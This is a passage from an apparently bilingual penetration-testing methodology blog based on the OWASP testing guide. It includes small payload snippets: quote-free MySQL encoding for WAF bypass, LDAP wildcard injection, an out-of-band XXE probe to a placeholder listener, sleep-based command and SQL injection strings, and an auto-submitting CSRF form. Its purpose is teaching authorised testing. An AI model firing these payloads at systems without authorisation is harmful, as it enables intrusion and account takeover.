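    """Encode a string as a MySQL hex literal, e.g. 'A%' -> '0x4125'."""
    return "0x" + s.encode("ascii").hex().upper()

def to_mysql_char(s: str) -> str:
    """Encode a string as a MySQL char() expression, e.g. 'A%' -> 'char(65, 37)'."""
    return "char(" + ", ".join(str(b) for b in s.encode("ascii")) + ")"
```

Useful when a WAF or the application itself blocks or escapes single quotes but passes the rest of the statement through.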

LDAP test

I reproduced an LDAP injection vulnerability, CVE-2017-14596, a long time ago. It was an assignment for the Red Sun Security code audit team, so I never posted it on the blog, and unfortunately the original write-up is lost. LDAP is the Lightweight Directory Access Protocol; authentication in a Windows domain is one kind of LDAP. LDAP queries have their own peculiar syntax, which newcomers to penetration testing may not know well, so here is a brief introduction.

Many abbreviations are used in the LDAP protocol

  • dn (Distinguished Name) identifies an entry’s location in the directory; compared to SQL, it is like a query expression pointing at one place in LDAP
  • dc (Domain Component) the zone a record belongs to, i.e. the domain-name part
  • ou (Organization Unit) the organization a record belongs to
  • cn (Common Name) a user name or server name

Suppose a web application uses a search filter

searchfilter="(cn=" + user +")"

From the perspective of URL, the parameter transfer is like this

http://domain.com/ldapsearchfilter?user=

If instead of a user name we supply a single * after user, the query code becomes

searchfilter="(cn=*)"

The asterisk acts as a wildcard, so the query displays the attributes of all users, or of some of them, depending on the application’s execution flow.

I have personally found only two LDAP injections, both during user authentication. Characters such as (, \, |, & and * can reveal LDAP injection. I recommend Burpsuite’s Intruder: put the LDAP injection test characters ahead of your SQL injection payloads, and fuzzing will surface the results.
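
The wildcard problem above, plus the RFC 4515 escaping that prevents it, can be shown in a few lines (the filter shape follows the earlier example):

```python
def naive_search_filter(user: str) -> str:
    """The vulnerable concatenation from the example above."""
    return "(cn=" + user + ")"

def escape_ldap_value(value: str) -> str:
    """Escape LDAP filter metacharacters per RFC 4515."""
    table = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\0": r"\00"}
    return "".join(table.get(ch, ch) for ch in value)
```

With escaping, a submitted * reaches the directory as the literal sequence \2a instead of acting as a wildcard.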

XXE

XXE requires the server to parse XML. During testing you often see XML mentioned in the response’s Content-Type, but containing XML does not mean external entities are parsed; that has to be verified manually. XXE also turns up surprisingly often at file-upload endpoints.

When testing XXE, it is best to ask the development team for a server on the same network segment to receive out-of-band data. Most XXE is blind, so you need the receiving server’s web log to capture the out-of-band request; when the development network is isolated from the Internet, an external VPS will never see the data.
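
A minimal out-of-band probe looks like this; the listener address is a placeholder for the in-segment server mentioned above:

```python
# Placeholder for a collaborator/listener you control on the same segment
COLLAB = "http://10.0.0.5:8000"

XXE_PROBE = (
    '<?xml version="1.0"?>\n'
    "<!DOCTYPE root [\n"
    f'  <!ENTITY probe SYSTEM "{COLLAB}/xxe">\n'
    "]>\n"
    "<root>&probe;</root>"
)
```

Submit this wherever the application accepts XML; a hit in the listener’s access log confirms the parser resolves external entities even when nothing echoes in the response.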

Code injection

Some web pages allow users to enter code that the server then executes. In code injection testing, the tester submits input that the web server processes as dynamic code or as an included file. Code injection here covers the usual command injection, often found in web back ends. Beyond web applications, code injection also appears frequently in the management pages of host devices; unlike the web case, these are mostly command injections into the terminal shell, because host devices often have no database and use the command line for authentication or code execution.

Finding code execution in a web application is mostly about sniffing out the spots where commands might be executed. I divide web applications into two broad classes. The first is large open-source CMSes and frameworks, such as ThinkPHP, WordPress and Laravel. These have been audited and mined by countless security experts, and without deep skills it is hard to dig out a code injection in them. When you meet a product built on top of such an open-source base, focus on the features added beyond the original and on whether the native filter functions are called appropriately; from a black-box angle, that means testing the pages that differ from the upstream project. The second class is self-developed web applications, where the odds of code injection are far higher. Infer the back-end logic from the front end and probe every point where code injection might live. Search hard, because you never know how peculiar (no offense) a developer’s idea can be.

The most efficient way to test code injection, in my view, is to fuzz it together with SQL injection and LDAP injection, adding commands such as sleep to the payload set; fuzzing always brings surprises.
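
One way to wire the sleep idea into a fuzz loop is to compare each payload’s round-trip time against a baseline; send_request stands for whatever function fires one request at your target, so everything here is a sketch:

```python
import time

# A few classic time-delay payloads (shell and MySQL variants)
SLEEP_PAYLOADS = [
    "; sleep 3",
    "| sleep 3",
    "$(sleep 3)",
    "' AND sleep(3)-- -",
]

def _elapsed(send_request, payload: str) -> float:
    start = time.monotonic()
    send_request(payload)
    return time.monotonic() - start

def time_based_probe(send_request, payloads, delay: float = 3.0,
                     margin: float = 1.0) -> list:
    """Return the payloads whose request ran roughly `delay` seconds over baseline."""
    baseline = _elapsed(send_request, "harmless-probe")
    return [p for p in payloads
            if _elapsed(send_request, p) - baseline >= delay - margin]
```

The baseline subtraction matters on slow or jittery targets; repeat suspicious hits a few times before drawing conclusions.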

Buffer overflow

Strictly speaking, buffer overflows also count as injection vulnerabilities, but I think they are hard to detect by manual black-box testing (perhaps that only reflects my own limits). In a modern SDLC, black-box testing is preceded by white-box code audit, and buffer overflows should be eliminated there. In black-box testing, overflow vulnerabilities can still be found by scanners, and the same goes for DoS.

File Upload

File upload vulnerabilities are easy to locate, because the upload function only ever appears in a few fixed places: avatar upload, profile upload, data sheet upload and so on. But in my experience, the definition of file upload should be broader. Some logs are writable, so an exposed log file path becomes exploitable. Some project-management applications can create work orders; if a work order is stored as a separate file, that counts as a file upload too. And some formats, CSS for example, do not require the whole file to be syntactically valid; a valid fragment is enough.

《渗透测试》

通过积累测试经验,逐渐建立自己的成体系化的测试方法论。目标是随着经验的累积,从一开始对照着checklist逐步排查,到心中有清晰的测试脉络,到最后从心所欲不逾矩。

本文很长,是我根据《OWASP安全测试指南》和从将近一年的渗透测试经历中整理的方法论。文中涉及的技术干货比较少,更多的是对于企业/安服渗透测试的思路层面的分享。我认为高级渗透测试工程师除了必备的技术以外,更重要的是面对系统能有自己的成体系的测试矩阵。与漏洞挖掘,Web攻击不同的是,我认为渗透测试工作讲究的是在高代码测试覆盖的同时提升测试效率,确保业务系统的各个组件的安全独立性。希望能够帮助还在处于渗透测试新人的同行们快速建立自己的测试体系架构。

信息收集

一次测试的完成度取决于信息收集的完整度,在不断的测试中对这句话的体验越来越深。在我现在看来不仅仅要将信息收集完整,还要有将信息整合建立体系的能力,类似于星状图,测试中要将和该功能相关的所有信息点全部覆盖。

谷歌搜索

这个在测试业务的时候倒没那么需要,毕竟会拿到一份资产报告,里面囊括了需要涵盖的所有对象。但是在红蓝对抗或者打靶场的时候,就需要着重搜集类似于代码泄露,用户名,有时候还能搜索到一些重要文档,登录接口等等。使用’site’、’intext’、’inurl’等等关键字进行精准搜索。

Web服务器指纹

识别网站使用的框架可以缩小我们的攻击范围。一些Web中间件可能由于版本老旧,存在漏洞可以直接利用。另外获取Web服务器信息,从而了解其特点也可以在我们的后续渗透过程中提供帮助,比如测试文件上传绕过的时候。

识别Web服务器指纹最直接的方式就是看数据包响应头中的’Server’字段,但是绝大多数的厂商为了安全考虑都会想方设法隐藏Web服务器的banner,此时有几种方法来帮助进行判断。

  1. HTTP报头字段排序,不同的Web服务器对字段的排序不同。
  2. 请求不存在的/报错的页面,观察响应。
  3. 通过扫描器,在线工具等进行识别。

Web服务器元文件

robots.txt中罗列了禁止爬虫爬取的目录,测试指南上只写了关于robots.txt文件的存在的信息,我认为这里还可能有更多可以挖掘的存在,其他的敏感文件如果泄露后果也一样致命。前端源代码打包下载这个问题发生过不少次,直接把代码下载下来审计相当于不穿衣服。在前端的JS代码中也可以寻找Cookie的生成规则;注释内容中可能存在硬编码口令;应用测试阶段写在代码的内部IP、邮箱、账号等等信息也可能存在。这些多存在于小公司/小制作,大型的Web应用一般不存在上述这类问题。另外Sitemap、.DS_Store、crossdomain.xml等等文件也会暴露敏感信息。

在做渗透测试的时候这些工作一般都是交给扫描器的,对于不能扫描的网站可以找一些fuzzDict来做专项的测试。

枚举Web服务器应用

尽可能地探索Web服务器上运行的所有应用。有的时候同一个IP地址有可能映射到不同的web应用中,根据域名的不同也会映射到不同的web应用上去。我记得有一个HackTheBox上的题目就是虚拟主机,需要修改hosts文件,将另一个域名和ip绑定,才能访问到有漏洞的Web应用。

同一个IP下,根据URL可能会解析到不同的Web应用中去

对于这类隐藏的Web应用,如果没有机会浏览目录,就只能寄希望于爬虫/扫描器进行发现,或者在谷歌搜索的时候就可以发现site:www.example.com。

对于开放了多端口的Web服务器,我们可以使用Nmap等工具对全端口进行扫描,防止厂商将一些敏感入口配置到高端口,平时难以发现。

对于使用了虚拟主机的Web服务器,可以通过查询DNS记录或者是反向IP查询,找到这些隐藏的Web应用。借助在线工具即可。

识别应用入口

根据测试指南对本节的解释,主要是使用Burp拦截请求来测试参数,也就是传入应用的参数。根据实际经验,有一些参数是框架参数,几乎在所有的请求中都会存在。这些参数的名称可能是符号或者是各种缩写,可以先针对这些频繁出现的参数进行测试。这样会为整个的测试流程大大的节省时间,也能搞清楚这些参数的意义,避免出现一大堆参数不知道该测哪一个的情况出现。

映射应用程序的执行路径

测试中面对一个庞大的Web应用,很难去做到代码库的测试全覆盖,只能尽力的去多测一些代码。根据测试指南上总结的,将提高代码测试覆盖率的方法总结为三种:路径、数据流和竞争。

从黑盒测试的角度来说,我们能看到的仅仅就是URL中的路径。一开始拿到应用的时候,最好能开一个excel表格或者带结构的记事本,来记录一下几条比较容易出问题的路径。昨天我在测试的时候发现了一个api接口的越权问题,推测应该是普遍存在的现象。但是由于我一开始没有对路径做记录,导致重新翻找的很痛苦。还有一点就是在记录路径/api的时候,一定要注明入口链接,不然找到最后找到漏洞点了,完全忘了是从哪里进来的。

识别Web应用框架

和识别Web服务器一样,知道应用框架可以从已知漏洞库入手,先过一遍。如果有惊喜就可以直接提交,有些地方因为业务比较特殊,无法按照框架提供厂商的修复建议修复,都是Web应用厂商自己修的,难免会有一些疏漏。如果测试的时候感觉不对劲,可以尝试进行绕过。

至于识别Web应用框架一是凭借自己的经验,比如你是一个经验丰富的测试者,测试过许许多多的框架了,通过一个页面或者一个报错提示就能分辨。有的时候厂商刻意的隐藏了框架特点,这种时候可以借用一些在线的工具来进行识别。

工具

  • netcraft。在线工具,识别Web服务器以及页面基本信息。What’s that site running?
  • Nmap。扫端口查服务、版本,用的时候对着手册看看参数就行。
  • BurpSuite。没啥好说的,2.0联动sqlmap和Xray挺好用的。
  • WhatWeb。识别Web应用。WhatWeb - Next generation web scanner.
  • BlindElephant。原理是根据静态文件不同版本的校验值不同来识别,所以精准度很高。BlindElephant

配置管理测试

对于渗透攻击,挖SRC的时候,对于配置的测试可能很少涉及到。但是在工作中,业务上线前必须要对配置的安全性进行核验。这里更多的是从厂商角度对即将上线的产品的配置安全与否做测试。在这其中涉及到一个很重要的安全思想,即安全的不可依赖性。比如我的Web应用有SQL注入漏洞,但是前端有waf防护,攻击者看起来并不能对Web应用造成伤害。但实际上这是不安全的,就如同串联电路一样,一个灯泡坏了一条电路的灯泡也不能亮了。同一个思想从Web应用层面迁移到Web服务器/网络配置层面,不能仅依赖于Web应用安全来确保服务器的安全,服务器自身的配置也要正确来确保安全的最大化。

网络与基础设施

首先识别所有的组件,确保这些组件不存在已知漏洞,并且用于管理这些组件的系统也不能存在漏洞。严格控制对于这些组件的访问,维护一个应用程序所需端口的列表。

对于服务器的测试很难做,一般都会使用一些自动化的工具或是脚本。在使用工具的时候也要慎重,可能会造成服务器宕机/拒绝服务,同样的情况也存在于对Web的测试中。自动化工具对Web服务器的测试存在漏报和误报,漏报是因为有些管理员为了隐藏服务器信息,将版本信息做了删除或者混淆,导致工具无法正确检测服务器组件版本。误报是因为管理员对已知漏洞用补丁进行了修复,却没有更新Web服务器的版本。

作为测试人员在测试主机的时候,更多的是用扫描器扫描,报出来的多为一些弱加密套件,支持低版本协议等等,对于漏报的漏洞很难加以侦察。这里又用到了安全性不可依赖的思想,开发/运维人员应当遵守安全开发规则进行服务器配置,运维人员应及时修复新公布的漏洞,不能全依靠渗透测试发现漏洞。

应用平台配置

Web应用可能残留demo,测试页面。或者是在测试环境下为了方便所设置的一些配置,包括但不限于同账号同时登录,万能密码/验证码。

黑盒测试人员是没有配置指南的,所以测试起来会有些盲目。根据OWASP测试指南上的整理归纳,我结合我自己的测试总结了一下

  • 发送几个畸形参数,类似于负值,字符等等,检查Debug模式有没有关闭。
  2. 继续发送畸形参数,请求不存在的文件,确认返回页面不包含报错信息。
  • 看日志,增删改查是不是都在日志上,是不是遵守三员分立原则(admin, audit, user)。
  • 中间件的配置文件,网站的配置文件不能被访问
  • 查看管理员面板中的各种奇奇怪怪功能。

日志

日志文件重要性不言而喻,Web应用对日志的记录,管理,存储都要测试。

首先应该避免日志文件泄露敏感信息,与之相关的就是信息的加密,加密算法是否可靠都要在这里进行考虑。

日志是否只有日志审计员能看,日志是否不可被删除,审计日志的记录由谁来审计?这里涉及到三员分立的思想比较多。

日志是否存储在日志服务器上,日志是否设置了最大存储限制,达到了最大存储限制时怎么办?

敏感文件

开发完成后上线应用时对敏感文件的清理不彻底,更新之后敏感文件清理不彻底等多种情况会造成敏感文件泄露。可能是服务器配置文件,可能是源代码泄露。测试的时候一是凭借经验,二是靠扫描器扫到,三是偶尔可以从注释里面发现(不过现在扫描器也会顺便扫一下注释内有没有敏感内容),还有就是Google hacking。有的时候虽然删除了敏感文件,但是因为之前存在过导致敏感文件位置会残留在Google hacking数据库里,可以进行同类文件推断。

HTTP方法测试

HTTP的其他方法可能会对Web应用程序造成安全问题

  • PUT方法允许攻击者上传文件到服务器,最经典的IIS PUT漏洞。
  • DELETE方法允许攻击者删除服务器上的文件。
  • CONNECT允许攻击者将Web服务器作为代理。
  • TRACE一开始被认为无害,后被发现可以被用于跨站跟踪(CST)。

测试的时候使用OPTIONS请求检查一下都支持什么请求,或者一个一个试一下也行。注意一下一些框架允许使用HEAD方法代替GET,会造成基于角色的访问控制越权,另外GET和POST两个方法替换越权也要注意测试一下。

目前绝大多数厂商都要求了强制HTTPS,测试一下HTTP是否能用

身份管理测试

这里所说的身份管理并不特指为权限管理,更多指向的是在用户注册过程中所涉及到的一些管理相关的测试。

注册

我们熟知的网络应用注册功能可以大致分为几种

  • 后台注册,不开放注册接口
  • 邀请码注册,例如XssPlatform,t00ls
  • 手机号/邮箱注册
  • 账号密码注册

对于渗透测试来说,第一种后台注册不在我们的测试范围之内,或者说不在本节所讨论的测试范围之内。这种注册涉及到的弱口令,测试口令残留等等可以放在后面的认证测试之中。

邀请码注册中,主要的问题在于邀请码的安全性。是否可猜解?是否可以重复使用?获取邀请码的过程如何?如果邀请码中包含了所注册用户应有的权限自不必说,如果邀请码仅仅是验证用户拥有注册资格,而不决定用户权限的时候,安全性就要和下面两个一起讨论。

手机号,邮箱,乃至社交平台注册是当今最流行的一种注册方式,与前面两个相比,这种注册是面向任何人开放的。在做测试的时候主要针对以下几个方面

  • 同一个用户/身份能否多次注册
  • 能否注册多种权限的用户
  • 输入的邮箱/手机是否进行了验证

关于最后一种账号密码测试,其实与第三种类似,不同点在于账号分为系统发放和用户输入。系统发放的账号要关注账号的随机性和不可预知性(视情况而定是否需要),用户输入的话就要验证是否重复和是否符合统一格式。

账户枚举

通常在测试的时候出现横向越权漏洞,我们会去搜集其他用户的身份鉴别符,类似于UID等等的信息。对于Web应用来说,这种用来鉴别用户的敏感参数原则上要保证它难以被枚举。举例微信的用户id就是十分复杂难以被枚举的,感兴趣的朋友可以去看一看。

那么作为测试人员,可以用下面的几种方法来尝试收集用户标识

  • Web应用响应。发送HTTP请求的时候更换uid观察response是否一致,或者说会不会提示用户不存在。响应的范围还可以是报错,404/403/200等等。
  • URI中收集。有些Web应用使用了路由功能,可以从URI中看到。这时可以找到类似于好友列表,关注/粉丝列表,评论区等等出现其他用户的地方进行收集
  • 规则推测。注册多个用户来推测用户名生成的原理,一般都会有时间戳、注册信息的介入。

认证测试

认证,指的是确定或证实一个人或者事物的行为是真实可信的。在网络安全中,认证是企图验证通信发起者数字身份的过程。比如登录就是一个最简单的验证过程。而相对安全员来说,测试验证就意味着要理解验证模式,测试能否利用漏洞或者策略绕过认证。

传输测试

现在的但凡是有点规模的厂商推出的Web应用产品都应该强制支持HTTPS。在黑盒测试中我们主要关注在数据传输的过程中,比如登录页输入用户名密码的时候,是不是通过POST请求强制使用HTTPS协议发送的。

首先必须是HTTPS请求,为了防止课本上经常看到的MITM攻击,也就是中间人攻击。谁也不想大家在咖啡厅,被隔壁桌子的黑客搞了个arp欺骗转发,然后你访问了个HTTP网站,所有的访问记录裸奔在黑客的电脑上。这个防范措施真的不可小觑,因为出了家里或者单位,没有人每到一个地方就将网关写死,arp欺骗总是防不胜防。

其次为什么要使用POST请求而非GET请求,虽然HTTPS处在七层协议的第五层,GET请求中的数据也是被加密保护起来的,但是GET请求中的URL记录经常会被保存在日志文件、访问记录中,而且一般也是明文存储,增加了敏感信息被泄露的风险。

最后就是要验证referer也要是HTTPS的网页,不然会存在SSL-Strip攻击。

账号密码测试

首先就是密码强度测试,一般的Web应用如果有注册功能都会要求使用8位以上数字+字母+一位大写+特殊字符的模式。对于黑盒测试来说,可以在创建账号密码的地方看一看密码规则来测试。

然后就是弱口令测试,一般在开发阶段,开发人员都会用一组便于输入的密码来登录。同时有些Web应用登陆的时候要求输入验证码,开发人员也会为了方便留下一组万能验证码。我们测试的目的就是要找到这些可能存在的弱口令。另外管理员创建的新用户是不是使用了默认密码,第一次登录是不是强制要求修改密码等等。

另外一个角度就是锁定,比如当输入密码超过多少次错误的时候锁定账号多久,具体策略应该和Web应用的敏感程度有关,但毫无疑问应该存在这一机制避免密码被爆破。

认证绕过

这里仅仅讨论一些认证功能的绕过,越权等问题不在这里做讨论。绕过登录框最常见的手段还是SQL万能密码注入。另外上古时代还有一些网页不做登陆验证,明明应该是登陆之后的展示页,结果在浏览器里输入URL就可以直接访问。现在还有一些鉴别登陆状态的方法是通过参数,类似于“authorized”等等,还有些开发人员自作聪明,将这类字段换个名字,或者写在Cookie里面,感觉很难被发现,其实一碰就碎。

授权测试

这个授权测试不是说你的测试经过授权,而是对授权本身进行测试。其实我认为叫鉴权测试更好,但是OWASP指南上这么写的,我也就照搬了。

目录遍历/文件包含

黑盒测试的时候要找到这样的测试点,主要关注

  • 是否存在用于文件操作的请求参数
  • 是否存在异常的文件扩展名
  • 是否存在有趣的变量名称
  • 是否可以确定Web应用通过Cookie动态生成页面内容

我们见得多的都是在CTF题目里发现了目录遍历或者是最后RCE需要文件包含,但是在测试中这些利用简单,修复简单的漏洞很难跑到公网上去,因此我们在留意URL的同时,还要注意一些API接口。现在前后端交互经常使用json,xml等等,这些数据中的参数也可能是文件标识符,有时候多关注这些地方会有意外的收获。这里有点像最后一条Cookie内容动态生成网页,本质上也是文件标识符写在Cookie里面。

这里当然在测试的时候有一些技巧,需要熟悉Web环境,针对不同的服务器/中间件构造不同的测试payload。这里还有一个好玩的漏洞,叫做相对路径覆盖,天师同学写过一篇文章讲的很清楚。

RPO攻击方式的探究 - FreeBuf网络安全行业门户

前几天测试的微信小程序,上传图片之后将图片存储到了专门的文件服务器,返回包中有图片存储地址,跟进去一看有目录穿越。感觉目录穿越就是要多加小心,没啥技术可言,仔细找总能碰到。

授权绕过

账号注册再注销是否还能使用功能?支持同时在线的账号一个PC下线了另一个是否能使用功能?访问高权限页面被拒绝是否跳转?前端是否泄露信息?API是否未授权使用?

对于最后一个API问题其实大量存在,这需要有一个好的开发。我前两周测试的一个系统,初测的时候反馈了API未授权问题,结果复测发现反馈的API修了,其他API还是未授权。发现此类问题最好跟开发一起进行API的稽查,统一使用一套鉴权逻辑。

对于绕过权限判断逻辑的方法有很多种,除了最基本的替换id,参数等等,还可以替换HTTP方法从POST改GET之类的。

还有一些逻辑上的问题,例如修改密码页面/注册页面分为Page1到5,但是没有经过Page3就可以直接在地址栏里输入Page4跳转等等。

权限提升

根据三员分立原则,一套业务系统分为管理员,审计员和用户,也可以将未登录用户算成一种角色。在测试的时候,根据不同业务系统区分出所有的角色并梳理出各自可以使用的功能。举例来说,所有公司都会有客服热线电话。这种客服电话并不是用手机接听的那种,而是接入一套客服电话系统分配给所有的业务员进行接听。各位可以想象一下这套业务系统会有什么样的角色?首先三员分立模型中的管理员和日志审计员是必须存在的,用户这个角色在这个场景可以进行拆分。首先是前台接线员,他们应该没有权限查看用户的个人资料以及用户所咨询设备的信息,他们只负责听取用户的需求并将用户转接到对应话务员。前台接线员应该能查看所有业务员的接入编号与信息。具体的业务员接到客户电话后应该可以查看客户信息以及自己部门所负责的业务设备信息,不能查看别的部门。

再举一个例子,一套SRC系统应该分别设立几个角色呢?首先还是三员分立原则,其中的用户又可以分为两种:企业和白帽子。白帽子可以向对应的企业提交漏洞,但是只能查看自己提交的漏洞,可以查看其他白帽子的部分信息;企业可以查看所有自身相关的漏洞,不能查看友商。除此之外还有未登录用户,他们不能查看白帽子的信息,但是可以浏览部分内容等等。

诸如此类的,核心思想就是要理清每一套系统的角色功能特点,再进行测试。

具体在测试过程中要注意不是看不到就不存在越权,直接输入仅高权限用户可查看的URL或许可以访问。高权限用户在高权限页面的一些操作例如刷新、编辑、点赞等等都可能出现越权造成信息泄漏,注意留心。

会话管理测试

任何基于Web的应用程序的核心组件是用来控制和维护网站用户与其交互状态的一种机制,这种机制被称作会话管理,直观讲就是Cookie和Session。渗透测试中如果能够拿下Cookie就约等于拿下了账号,不过现在安全性高的系统都会避免这种情况的发生,将替换Cookie就可登录归为了一种漏洞叫做Cookie越权。但是在绝大多数中小型公网系统上普遍存在替换Cookie登录,因此Cookie的安全性至关重要。

会话框架绕过

Cookie中会保存一些信息比如用户id,权限标识,token等等,但通常是经过算法进行加密的。首先可以从前端JS代码中找找有没有泄露Cookie生成逻辑的,一般扫描器就可以发现。如果没有的话可以尝试搜集大量Cookie寻找一定的规律进行暴力破解攻击,但是此种方法极其不推荐,效率太低了,在日常繁重的渗透测试中我认为完全没有必要。

还有一种思路,虽然所有的传输数据包中都带着Cookie,但是有些地方对Cookie的验证非常奇葩,删掉Cookie也可能导致绕过。

数据包中的Cookie强制要求加密传输,如果不加密安全性几乎为0。特殊情况就是Cookie中有一个8位以上随机的用户id,后台根据id鉴别权限。

Cookie属性

Chrome有个插件叫做Edit This Cookie(https://chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg/related?hl=en-US),可以查看Cookie中的属性。以CSDN为例,上面可以修改Cookie对应每一个Key的Value值,下面可以查看Cookie中的几个关键属性是否进行了设置。这里的Cookie是未登录状态。

Secure属性是告诉浏览器只在请求通过HTTPS的安全通道发送时才加入Cookie,这可以防止Cookie明文传输;HttpOnly属性可以防止XSS获取Cookie,不允许客户端通过脚本语言例如JS操作Cookie;Domain属性应该设置为需要接受该Cookie的服务器,注意要特指到某一个服务器上,而不是整个二级、三级域名;Expires属性管理Cookie过期时间,要把此项值设置到一个合理的区间上。

会话固化测试

当应用程序在用户成功认证之后未更新会话Cookie,攻击者就有可能利用会话固定漏洞,迫使用户使用攻击者已知的Cookie进行登录。这样当登录成功时Cookie没有发生变化,用户的会话自然就泄露了。测试过程中注意观察登录成功前后Cookie有没有发生变化。
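
下面用一个最小化的示意代码表达这个检查(其中的Cookie名称只是常见框架的默认值,属于假设,需按目标应用实际情况调整):

```python
# 常见的会话Cookie名称(PHP、Java、Django),仅作示例
SESSION_COOKIE_NAMES = ("PHPSESSID", "JSESSIONID", "sessionid")

def session_fixation_risk(pre_login: dict, post_login: dict,
                          names=SESSION_COOKIE_NAMES) -> bool:
    """若任一会话Cookie在登录前后保持相同的值,则返回True"""
    return any(
        name in pre_login and pre_login[name] == post_login.get(name)
        for name in names
    )
```

如果返回True,说明认证前抓到的Cookie在登录后仍然标识该会话,这正是会话固定攻击的前提条件。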

CSRF

CSRF漏洞也属于会话管理不当导致的。这里就不介绍CSRF的原理了,不知道的可以自行查询。在实际挖掘的过程中,我们要重点关注核心功能处是否存在CSRF。比如修改密码,重置密码,转账,购买,删除,添加等等。这是一个非常繁琐的过程,不能仅仅从数据包里有没有Referer字段来判断,因为有些应用由团队开发,不同的程序员负责不同的功能模块,程序员的安全开发水平不尽相同。有些程序员不会对数据包中传输的Referer字段做校验。

这里我分享一下我的经验。在渗透测试过程中,每开始测试一个新功能/模块,我都会进行SQL注入/XSS的尝试。有些安全开发水平比较高的程序员会进行SQL语句参数化查询,XSS前端转义的防御方法。对于这种安全水平很高的程序员开发的模块,我会去验证一到两个CSRF漏洞是否存在,如果都对Referer进行了校验那么我就会认为这个模块不存在CSRF。而对于还存在SQL注入过滤关键词,XSS黑名单过滤等等不是很安全的防御方法所在的模块,我会尽可能的去测试每一个有CSRF漏洞的点。这个经验虽然不能有助于提升CSRF检测的准确性,但是可以大大的提升整个渗透测试流程的效率。

CSRF存在于每一个GET/POST请求,JSON格式的数据也可以有CSRF,这里分享我写的另一篇文章JSON情境下的CSRF攻击。使用BurpSuite集成的CSRF POC Generator可以快速的生成测试POC。
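
除了Burp的生成器,这类PoC也可以手工拼出来;下面示意其结构,目标URL和字段名均为占位假设:

```python
import html

def csrf_poc(action_url: str, fields: dict) -> str:
    """构造一个自动提交的HTML表单,即经典的CSRF PoC"""
    inputs = "\n".join(
        f'    <input type="hidden" name="{html.escape(k)}" value="{html.escape(v)}">'
        for k, v in fields.items()
    )
    return (
        '<html><body onload="document.forms[0].submit()">\n'
        f'  <form action="{html.escape(action_url)}" method="POST">\n'
        f"{inputs}\n"
        "  </form>\n"
        "</body></html>"
    )

# 假设的修改密码接口,仅作示例
poc = csrf_poc("https://victim.example/user/changepw", {"newpass": "attacker123"})
```

把生成的页面放在任意位置,让已登录的受害者打开,观察这个改变状态的请求在缺少有效Referer时是否仍然成功。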

输入验证测试

我在学习渗透测试的过程中听到的第一句话就是“所有的输入都是不安全的”,这句话很经典,是我们在渗透过程中的心法。SQL注入、XSS、文件上传、RCE等等都是源于用户的输入,本节主要总结的就是面对各种各样的接受输入的功能,作为测试者怎样快速精确的找到漏洞。

XSS

XSS可能是大家在渗透测试中最经常见到的漏洞了,从测试方法来说没有什么稀奇的。如果前端转义了就可以不看,过滤的话就Fuzz一下看看。我认为XSS在测试中更重要的是覆盖面一定要广,有机会写入HTML的地方都要试试XSS。不仅仅是评论区,比如上传图片/文件名称,还有各种想不到的地方。我见过最奇特的一个XSS是一个调度公告栏,在编辑公告的页面发送编辑数据包,其中有一个key叫做class,大概是分类的意思。我在这个key对应的value处尝试加入XSS,发送后在该页面没有XSS显示,甚至没找到回显在哪。当我后退到浏览所有公告标题的页面时触发了XSS,F12看了一下源码发现class的value在这个页面被插入到了HTML代码中。

更自动化一些的XSS测试建议使用Xray联动,P牛主持开发的被动扫描器真的非常好用,缺点是会插入几百条XSS,如果后续还要对该功能测试可能会有些麻烦。

HTTP方法篡改

在HTTP1.1的所有HTTP请求方法中,除了第一条,其他的都应尽量禁止。

  • GET、POST 正常业务支持的方法
  • OPTIONS 查询支持的HTTP方法,在不同目录下执行可能会有不同效果
  • PUT 可以用此请求向服务器上传文件
  • DELETE 可以删除文件
  • TRACE 可以穿越防火墙和代理,回环诊断
  • CONNECT CONNECT方法是HTTP/1.1协议预留的,能够将连接改为管道方式的代理服务器。通常用于SSL加密服务器的链接与非加密的HTTP代理服务器的通信。

大多数情况HTTP危险方法都可以由扫描器直接发现,扫描器的覆盖面肯定要比人来得更广。当有些业务系统需要登录才能访问某些路径而扫描器不支持登录扫描的时候,要手工对这些登录后可访问的目录进行测试。
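
手工测试时,可以用一个小函数对OPTIONS探测返回的Allow头做快速分诊,标出上面列表中的危险方法(仅为示意):

```python
# 上面列表中通常应当禁用的方法
DANGEROUS_METHODS = {"PUT", "DELETE", "TRACE", "CONNECT"}

def risky_methods(allow_header: str) -> list:
    """解析'Allow:'头的值,返回其中宣告的危险方法"""
    advertised = {m.strip().upper() for m in allow_header.split(",") if m.strip()}
    return sorted(advertised & DANGEROUS_METHODS)
```

例如Allow头为"GET, POST, OPTIONS, PUT, TRACE"时,会标出PUT和TRACE供后续重点测试。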

HTTP参数污染

多个HTTP参数使用相同的名称可能导致应用以不可预料的方式运行。该漏洞曾经对ModSecurity SQL注入的核心规则库造成了影响。ModSecurity过滤器可以正常过滤字符串select 1,2,3 from table,所以当此字符串出现在URL中进行GET请求查询数据库的时候会被过滤。但是攻击者可以让ModSecurity过滤器接受多个同名输入,构造这样的URL:http://domain/?query=select 1&query=2,3 from table,不会触发过滤器,但是在应用层可以组成完整的SQL查询语句。

这里是不同语言/中间件对于同名参数的处理方式,有些是在中间加上如逗号的特殊符号分割,有些是只取第一个,有些只取最后一个。

测试的时候根据此表比对进行测试。
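
上面的拼接过程可以用Python标准库的查询串解析器离线复现,它会保留所有同名参数的值(用逗号拼接的后端行为是一个假设,对应经典ASP等中间件的处理方式):

```python
from urllib.parse import parse_qs

# 每个片段单独看都能通过朴素的关键字过滤……
qs = "query=select 1&query=2,3 from table"
params = parse_qs(qs)          # {'query': ['select 1', '2,3 from table']}

# ……但用逗号拼接同名参数的后端会在应用层重组出完整的注入语句:
joined = ",".join(params["query"])   # 'select 1,2,3 from table'
```

这也说明过滤层和应用层必须对同名参数的解析方式保持一致。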

SQL注入

SQL注入相信大家一定不陌生,这个应该是学习安全入门的第一个漏洞,也是被讨论的最频繁的漏洞之一。早期比较猖獗,随着安全意识的提升SQL注入漏洞的数量在下降,但是依然存在。原理就不细说了,具体的测试、绕过技术也不详细讨论,网上能找到的已经足够用了,本节只谈谈对于寻找SQL注入的经验和提升效率的方法。

拿到一套业务系统,首先要熟悉这套业务系统的发包参数。如同代码审计先看安装文件和路由一样,黑盒测试虽然看不到代码,但是可以看到一些几乎存在于每一个数据包,或者绝大多数数据包中的参数。首先对这些参数进行SQL注入的尝试,这样后面再遇到同样的参数就可以跳过。其次尽量找到一些很不明显的和数据库有交互的参数点,不要漏过每一个数据包。

